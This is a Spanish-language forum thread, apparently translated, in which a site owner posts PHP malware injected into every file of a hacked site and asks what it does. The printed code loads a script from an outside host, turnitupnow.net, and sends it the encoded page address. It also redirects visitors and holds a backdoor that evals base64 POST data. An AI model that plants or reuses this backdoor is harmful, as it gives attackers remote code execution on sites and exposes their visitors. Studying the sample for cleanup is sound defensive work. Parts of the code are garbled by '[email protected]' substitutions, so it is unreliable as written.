10
Nuestro servidor fue pirateado a través de algún método de inyección SQL (ahora parcheado). Todos nuestros archivos PHP tienen esto agregado a la parte superior de cada archivo.Hackeado: ¿Alguien sabe lo que hace este código PHP?
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if([email protected]$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
Parece que se establece una cookie, pero no tengo la primera idea de qué hace.
Cualquier expertos capaces de entender lo que esto hace y potencialmente lo que el nombre de la cookie que se crea que puede parecer por lo que puedo decir cualquier usuario etc
ACTUALIZACIÓN Visto el exploit se debe a un plugin en el Zenphoto Software de galería llamado Tiny_MCE.
¿por qué está etiquetado con sql injection? –
Lo que tengo curiosidad por saber cómo es la inyección de SQL ganado un atacante el acceso de sistema de archivos .... –
tenía la misma cosa en este momento, y yo decidimos hacer una restauración completa en lugar de escarbar en unos archivos squillion. Añadió scripts de cookies a cualquier archivo .php, y todo se esconde en htaccess, como dice Dave. Redirige y, en algún momento, colocará su sitio en la lista negra. No tan agradable. Buena suerte a todos. – Benteh